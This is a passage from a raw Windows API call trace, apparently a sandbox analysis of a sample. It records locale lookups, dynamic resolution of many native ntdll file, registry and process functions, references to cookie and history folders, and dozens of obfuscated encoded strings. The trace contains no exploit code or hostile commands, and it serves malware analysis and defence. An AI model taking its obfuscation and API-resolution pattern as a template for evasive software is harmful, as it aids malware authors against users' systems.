LCType=0x35, lpLCData=0x41f608, cchData=256 | out: lpLCData="Fri") returned 4 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x41f608, cchData=256 | out: lpLCData="Friday") returned 7 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x41f608, cchData=256 | out: lpLCData="Sat") returned 4 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x41f608, cchData=256 | out: lpLCData="Saturday") returned 9 [0043.459] GetThreadLocale () returned 0x409 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x41f664, cchData=256 | out: lpLCData="$") returned 2 [0043.459] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x41f75c, cchData=2 | out: lpLCData=",") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x41f75c, cchData=2 | out: lpLCData=".") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x41f664, cchData=256 | out: lpLCData="2") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x41f75c, cchData=2 | out: lpLCData="/") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x41f664, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0043.475] GetThreadLocale () returned 0x409 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x41f630, cchData=256 | out: lpLCData="1") returned 2 [0043.475] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x41f664, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0043.475] GetThreadLocale () returned 0x409 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x41f630, cchData=256 | out: lpLCData="1") returned 2 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x41f75c, cchData=2 | out: lpLCData=":") returned 2 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x41f664, cchData=256 | out: lpLCData="AM") returned 3 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x41f664, cchData=256 | out: lpLCData="PM") returned 3 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x41f664, cchData=256 | out: lpLCData="0") returned 2 [0043.476] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x41f75c, cchData=2 | out: lpLCData=",") returned 2 [0043.501] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0043.501] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0043.501] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0043.501] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0043.502] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0043.503] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0043.540] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstanceEx") returned 0x76669d4e [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoAddRefServerProcess") returned 0x76683cf3 [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseServerProcess") returned 0x76684314 [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoResumeClassObjects") returned 0x7662ea02 [0043.540] GetProcAddress (hModule=0x76620000, lpProcName="CoSuspendClassObjects") returned 0x7668bb02 [0043.612] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x9c [0043.612] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0043.612] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4 [0043.872] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7cc | out: lpPerformanceCount=0x41f7cc*=16402296040) returned 1 [0043.987] SysReAllocStringLen (in: pbstr=0x14ef06c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x14ef06c*="%Local, ApplicationData FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef068*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x14ef068*="%AllUsers, ApplicationData FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef064*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x14ef064*="%Temp FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef060*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x14ef060*="%ApplicationData FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef05c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x14ef05c*="%InternetCache FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef058*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x14ef058*="%Cookies FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef054*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x14ef054*="%History FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef050*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x14ef050*="%My Pictures FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef04c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x14ef04c*="%AllUsers, Documents FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef048*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x14ef048*="%Program Files, Common FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef044*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x14ef044*="%Program Files FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef040*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x14ef040*="%My Documents FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef03c*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x14ef03c*="%WINDOWS FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef038*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x14ef038*="%SYSTEM FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef034*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x14ef034*="%DEFAULT FOLDER%") returned 1 [0043.988] SysReAllocStringLen (in: pbstr=0x14ef020*=0x0, psz="af}l|}pvlv}w", len=0xc | out: pbstr=0x14ef020*="af}l|}pvlv}w") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14eef04*=0x0, psz="af}l|}pvlqvtz}", len=0xe | out: pbstr=0x14eef04*="af}l|}pvlqvtz}") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14eede8*=0x0, psz="p{vpxlca|gvpgz|}lv}w", len=0x14 | out: pbstr=0x14eede8*="p{vpxlca|gvpgz|}lv}w") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14eeccc*=0x0, psz="p{vpxlca|gvpgz|}lqvtz}", len=0x16 | out: pbstr=0x14eeccc*="p{vpxlca|gvpgz|}lqvtz}") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14eebb0*=0x0, psz="e~lv}w\x02", len=0x7 | out: pbstr=0x14eebb0*="e~lv}w\x02") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14eea94*=0x0, psz="e~lqvtz}\x02", len=0x9 | out: pbstr=0x14eea94*="e~lqvtz}\x02") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee978*=0x0, psz="e~lv}w", len=0x6 | out: pbstr=0x14ee978*="e~lv}w") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee85c*=0x0, psz="e~lqvtz}", len=0x8 | out: pbstr=0x14ee85c*="e~lqvtz}") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee740*=0x0, psz="f}ca|gvpgvwlv}w", len=0xf | out: pbstr=0x14ee740*="f}ca|gvpgvwlv}w") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee624*=0x0, psz="f}ca|gvpgvwlqvtz}", len=0x11 | out: pbstr=0x14ee624*="f}ca|gvpgvwlqvtz}") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee508*=0x0, psz="f}avtlpajcglv}w\x02\x05", len=0x11 | out: pbstr=0x14ee508*="f}avtlpajcglv}w\x02\x05") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee3ec*=0x0, psz="f}avtlpajcglqvtz}\x02\x05", len=0x13 | out: pbstr=0x14ee3ec*="f}avtlpajcglqvtz}\x02\x05") returned 1 [0043.989] SysReAllocStringLen (in: pbstr=0x14ee2d0*=0x0, psz="f}avtlpajcglv}w\x02\x06", len=0x11 | out: pbstr=0x14ee2d0*="f}avtlpajcglv}w\x02\x06") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ee1b4*=0x0, psz="f}avtlpajcglqvtz}\x02\x06", len=0x13 | out: pbstr=0x14ee1b4*="f}avtlpajcglqvtz}\x02\x06") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ee098*=0x0, psz="f}avtlpajcglv}w\x02\x07", len=0x11 | out: pbstr=0x14ee098*="f}avtlpajcglv}w\x02\x07") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14edf7c*=0x0, psz="f}avtlpajcglqvtz}\x02\x07", len=0x13 | out: pbstr=0x14edf7c*="f}avtlpajcglqvtz}\x02\x07") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ede60*=0x0, psz="f}avtlpajcglv}w\x02", len=0x11 | out: pbstr=0x14ede60*="f}avtlpajcglv}w\x02") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14edd44*=0x0, psz="f}avtlpajcglqvtz}\x02", len=0x13 | out: pbstr=0x14edd44*="f}avtlpajcglqvtz}\x02") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14edc28*=0x0, psz="f}avtlpajcglv}w\x02\x01", len=0x11 | out: pbstr=0x14edc28*="f}avtlpajcglv}w\x02\x01") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14edb0c*=0x0, psz="f}avtlpajcglqvtz}\x02\x01", len=0x13 | out: pbstr=0x14edb0c*="f}avtlpajcglqvtz}\x02\x01") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed9f0*=0x0, psz="f}avtlpajcglv}w\x02\x02", len=0x11 | out: pbstr=0x14ed9f0*="f}avtlpajcglv}w\x02\x02") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed8d4*=0x0, psz="f}avtlpajcglqvtz}\x02\x02", len=0x13 | out: pbstr=0x14ed8d4*="f}avtlpajcglqvtz}\x02\x02") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed7b8*=0x0, psz="f}avtlpajcglv}w\x02\x03", len=0x11 | out: pbstr=0x14ed7b8*="f}avtlpajcglv}w\x02\x03") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed69c*=0x0, psz="f}avtlpajcglqvtz}\x02\x03", len=0x13 | out: pbstr=0x14ed69c*="f}avtlpajcglqvtz}\x02\x03") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed580*=0x0, psz="f}avtlpajcglv}w\n", len=0x10 | out: pbstr=0x14ed580*="f}avtlpajcglv}w\n") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed464*=0x0, psz="f}avtlpajcglqvtz}\n", len=0x12 | out: pbstr=0x14ed464*="f}avtlpajcglqvtz}\n") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed348*=0x0, psz="f}avtlpajcglv}w\x0b", len=0x10 | out: pbstr=0x14ed348*="f}avtlpajcglv}w\x0b") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed22c*=0x0, psz="f}avtlpajcglqvtz}\x0b", len=0x12 | out: pbstr=0x14ed22c*="f}avtlpajcglqvtz}\x0b") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ed110*=0x0, psz="f}avtlpajcglv}w\x04", len=0x10 | out: pbstr=0x14ed110*="f}avtlpajcglv}w\x04") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ecff4*=0x0, psz="f}avtlpajcglqvtz}\x04", len=0x12 | out: pbstr=0x14ecff4*="f}avtlpajcglqvtz}\x04") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14eced8*=0x0, psz="f}avtlpajcglv}w\x05", len=0x10 | out: pbstr=0x14eced8*="f}avtlpajcglv}w\x05") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ecdbc*=0x0, psz="f}avtlpajcglqvtz}\x05", len=0x12 | out: pbstr=0x14ecdbc*="f}avtlpajcglqvtz}\x05") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ecca0*=0x0, psz="f}avtlpajcglv}w\x06", len=0x10 | out: pbstr=0x14ecca0*="f}avtlpajcglv}w\x06") returned 1 [0044.089] SysReAllocStringLen (in: pbstr=0x14ecb84*=0x0, psz="f}avtlpajcglqvtz}\x06", len=0x12 | out: pbstr=0x14ecb84*="f}avtlpajcglqvtz}\x06") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eca68*=0x0, psz="f}avtlpajcglv}w\x07", len=0x10 | out: pbstr=0x14eca68*="f}avtlpajcglv}w\x07") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec94c*=0x0, psz="f}avtlpajcglqvtz}\x07", len=0x12 | out: pbstr=0x14ec94c*="f}avtlpajcglqvtz}\x07") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec830*=0x0, psz="f}avtlpajcglv}w", len=0x10 | out: pbstr=0x14ec830*="f}avtlpajcglv}w") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec714*=0x0, psz="f}avtlpajcglqvtz}", len=0x12 | out: pbstr=0x14ec714*="f}avtlpajcglqvtz}") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec5f8*=0x0, psz="f}avtlpajcglv}w\x01", len=0x10 | out: pbstr=0x14ec5f8*="f}avtlpajcglv}w\x01") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec4dc*=0x0, psz="f}avtlpajcglqvtz}\x01", len=0x12 | out: pbstr=0x14ec4dc*="f}avtlpajcglqvtz}\x01") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec3c0*=0x0, psz="f}avtlpajcglv}w\x02", len=0x10 | out: pbstr=0x14ec3c0*="f}avtlpajcglv}w\x02") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec2a4*=0x0, psz="f}avtlpajcglqvtz}\x02", len=0x12 | out: pbstr=0x14ec2a4*="f}avtlpajcglqvtz}\x02") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec188*=0x0, psz="wvpajcgl|}lvkvpfgvlv}w", len=0x16 | out: pbstr=0x14ec188*="wvpajcgl|}lvkvpfgvlv}w") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ec06c*=0x0, psz="wvpajcgl|}lvkvpfgvlqvtz}", len=0x18 | out: pbstr=0x14ec06c*="wvpajcgl|}lvkvpfgvlqvtz}") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ebf50*=0x0, psz="avtlpajcglv}w\x02\x05", len=0xf | out: pbstr=0x14ebf50*="avtlpajcglv}w\x02\x05") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ebe34*=0x0, psz="avtlpajcglqvtz}\x02\x05", len=0x11 | out: pbstr=0x14ebe34*="avtlpajcglqvtz}\x02\x05") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ebd18*=0x0, psz="avtlpajcglv}w\x02\x06", len=0xf | out: pbstr=0x14ebd18*="avtlpajcglv}w\x02\x06") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ebbfc*=0x0, psz="avtlpajcglqvtz}\x02\x06", len=0x11 | out: pbstr=0x14ebbfc*="avtlpajcglqvtz}\x02\x06") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14ebae0*=0x0, psz="avtlpajcglv}w\x02\x07", len=0xf | out: pbstr=0x14ebae0*="avtlpajcglv}w\x02\x07") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb9c4*=0x0, psz="avtlpajcglqvtz}\x02\x07", len=0x11 | out: pbstr=0x14eb9c4*="avtlpajcglqvtz}\x02\x07") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb8a8*=0x0, psz="avtlpajcglv}w\x02", len=0xf | out: pbstr=0x14eb8a8*="avtlpajcglv}w\x02") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb78c*=0x0, psz="avtlpajcglqvtz}\x02", len=0x11 | out: pbstr=0x14eb78c*="avtlpajcglqvtz}\x02") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb670*=0x0, psz="avtlpajcglv}w\x02\x01", len=0xf | out: pbstr=0x14eb670*="avtlpajcglv}w\x02\x01") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb554*=0x0, psz="avtlpajcglqvtz}\x02\x01", len=0x11 | out: pbstr=0x14eb554*="avtlpajcglqvtz}\x02\x01") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb438*=0x0, psz="avtlpajcglv}w\x02\x02", len=0xf | out: pbstr=0x14eb438*="avtlpajcglv}w\x02\x02") returned 1 [0044.090] SysReAllocStringLen (in: pbstr=0x14eb31c*=0x0, psz="avtlpajcglqvtz}\x02\x02", len=0x11 | out: pbstr=0x14eb31c*="avtlpajcglqvtz}\x02\x02") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eb200*=0x0, psz="avtlpajcglv}w\x02\x03", len=0xf | out: pbstr=0x14eb200*="avtlpajcglv}w\x02\x03") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eb0e4*=0x0, psz="avtlpajcglqvtz}\x02\x03", len=0x11 | out: pbstr=0x14eb0e4*="avtlpajcglqvtz}\x02\x03") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eafc8*=0x0, psz="avtlpajcglv}w\n", len=0xe | out: pbstr=0x14eafc8*="avtlpajcglv}w\n") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eaeac*=0x0, psz="avtlpajcglqvtz}\n", len=0x10 | out: pbstr=0x14eaeac*="avtlpajcglqvtz}\n") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ead90*=0x0, psz="avtlpajcglv}w\x0b", len=0xe | out: pbstr=0x14ead90*="avtlpajcglv}w\x0b") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eac74*=0x0, psz="avtlpajcglqvtz}\x0b", len=0x10 | out: pbstr=0x14eac74*="avtlpajcglqvtz}\x0b") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eab58*=0x0, psz="avtlpajcglv}w\x04", len=0xe | out: pbstr=0x14eab58*="avtlpajcglv}w\x04") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14eaa3c*=0x0, psz="avtlpajcglqvtz}\x04", len=0x10 | out: pbstr=0x14eaa3c*="avtlpajcglqvtz}\x04") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea920*=0x0, psz="avtlpajcglv}w\x05", len=0xe | out: pbstr=0x14ea920*="avtlpajcglv}w\x05") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea804*=0x0, psz="avtlpajcglqvtz}\x05", len=0x10 | out: pbstr=0x14ea804*="avtlpajcglqvtz}\x05") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea6e8*=0x0, psz="avtlpajcglv}w\x06", len=0xe | out: pbstr=0x14ea6e8*="avtlpajcglv}w\x06") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea5cc*=0x0, psz="avtlpajcglqvtz}\x06", len=0x10 | out: pbstr=0x14ea5cc*="avtlpajcglqvtz}\x06") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea4b0*=0x0, psz="avtlpajcglv}w\x07", len=0xe | out: pbstr=0x14ea4b0*="avtlpajcglv}w\x07") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea394*=0x0, psz="avtlpajcglqvtz}\x07", len=0x10 | out: pbstr=0x14ea394*="avtlpajcglqvtz}\x07") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea278*=0x0, psz="avtlpajcglv}w", len=0xe | out: pbstr=0x14ea278*="avtlpajcglv}w") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea15c*=0x0, psz="avtlpajcglqvtz}", len=0x10 | out: pbstr=0x14ea15c*="avtlpajcglqvtz}") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14ea040*=0x0, psz="avtlpajcglv}w\x01", len=0xe | out: pbstr=0x14ea040*="avtlpajcglv}w\x01") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14e9f24*=0x0, psz="avtlpajcglqvtz}\x01", len=0x10 | out: pbstr=0x14e9f24*="avtlpajcglqvtz}\x01") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14e9e08*=0x0, psz="avtlpajcglv}w\x02", len=0xe | out: pbstr=0x14e9e08*="avtlpajcglv}w\x02") returned 1 [0044.091] SysReAllocStringLen (in: pbstr=0x14e9cec*=0x0, psz="avtlpajcglqvtz}\x02", len=0x10 | out: pbstr=0x14e9cec*="avtlpajcglqvtz}\x02") returned 1 [0044.138] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReadFile") returned 0x77c5f8e0 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenFile") returned 0x77c5fd54 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryAttributesFile") returned 0x77c5fe4c [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateSection") returned 0x77c5ff94 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwMapViewOfSection") returned 0x77c5fc40 [0044.139] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySection") returned 0x77c60040 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSection") returned 0x77c5fc70 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryFullAttributesFile") returned 0x77c6132c [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryObject") returned 0x77c5f9e8 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryDirectoryFile") returned 0x77c5fd88 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenSection") returned 0x77c5fdb8 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDuplicateObject") returned 0x77c5fe34 [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77c5ff7c [0044.140] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteFile") returned 0x77c609d4 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLockFile") returned 0x77c60e44 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnlockFile") returned 0x77c61ea8 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwTerminateProcess") returned 0x77c5fca0 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKey") returned 0x77c5fa18 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateValueKey") returned 0x77c5fa30 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryKey") returned 0x77c5fa80 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryValueKey") returned 0x77c5fa98 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateKey") returned 0x77c5fb30 [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateKey") returned 0x77c5fd3c [0044.141] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetValueKey") returned 0x77c601b4 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteKey") returned 0x77c609ec [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteValueKey") returned 0x77c60a34 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushKey") returned 0x77c60b70 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey") returned 0x77c60dfc [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey2") returned 0x77c60e14 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeKey") returned 0x77c60f60 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryMultipleValueKey") returned 0x77c6146c [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReplaceKey") returned 0x77c61738 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwRestoreKey") returned 0x77c617d0 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSaveKey") returned 0x77c61864 [0044.142] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationKey") returned 0x77c61a48 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnloadKey") returned 0x77c61e60 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwAccessCheck") returned 0x77c60218 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwExtendSection") returned 0x77c60b0c [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushBuffersFile") returned 0x77c5ffac [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFsControlFile") returned 0x77c5fde8 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77c60f48 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySecurityObject") returned 0x77c61518 [0044.143] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetSecurityObject") returned 0x77c61b8c [0044.143] 